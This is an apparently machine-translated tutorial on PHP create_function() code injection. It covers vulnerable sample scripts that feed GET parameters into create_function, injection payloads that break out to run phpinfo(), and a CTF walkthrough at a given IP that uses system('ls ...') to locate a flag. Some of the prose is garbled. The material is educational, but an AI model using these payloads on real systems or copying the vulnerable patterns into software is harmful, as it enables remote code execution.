() Function Introduction 00x00create_function
PHP 4> = 4.0.1
Scope: PHP 5
, ,PHP 7
Function: Create anonymous function according to the parameters passed, and returns its unique name.
grammar:
create_function ( String $ args , String $ code ) // function declaration variables string $ args portions methods // string $ code executed by code portions
0x01 Functions to Analyze
Case
<?php $newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);'); echo "New anonymous function: $newfunc\n"; echo $newfunc(2, M_E) . "\n"; ?>
create_function()
Creates an anonymous function ( lambda
style)
create_function () function is executed within the eval () , we found the back of the implementation of return
the statement, which belongs to create_function()
the second argument in string $code
position.
Thus create_function function is equivalent to
<?php function lambda1($a,$b){ return "ln($a) + ln($b) = " . log($a * $b); } ?>
0x03 implementation code injection case
Case number one:
<?php error_reporting(0); $sort_by = $_GET['sort_by']; $sorter = 'strnatcasecmp'; $databases=array('1234','4321'); $sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);'; usort($databases, create_function('$a, $b', $sort_function)); ?>
payload
Construction:
http://localhost/test/1.php?sort_by='"]);}phpinfo();/*
The actual reduction process in combination:
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*
The actual implementation of the anonymous function:
function niming($a,$b){ return 1 * ' . $sorter . '($a["' . $sort_by '"]);
}
phpinfo();/* }
Case 2:
<?php $c=$_GET['c']; $lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen($c));"); $array=array('reall long string here,boy','this','midding lenth','larget'); usort($array,$lambda); print_r($array); ?>
payload
Construction:
http://localhost/test/2.php?c=1));}phpinfo();/*
The actual reduction process in combination:
$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));");
The actual implementation of the anonymous function:
function ft($a,$b){ return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*)); }
There is a 0x04 create_function code injection of CTF
Address: http://198.13.45.199:5007/
Two links, click on "do not point I" link to jump to a page with php source http://198.13.45.199:5007/index.php?source
See create_function function, there should be injected
GET request, just pass a code value, and ";" can be closed should the payload successfully constructed
Construction payload:
http://198.13.45.199:5007/index.php?code=1;}phpinfo();/*
Successful code execution
A system () function command to perform system operations
Construction payload:
http://198.13.45.199:5007/index.php?code=1;}system(%27ls%20../../../%27);/*
Ls directory with straight turn, turn until the name of the file containing the flag, and then open the cat will get flag:
From the PHP 7.2.0
start, create_function()
it is discarded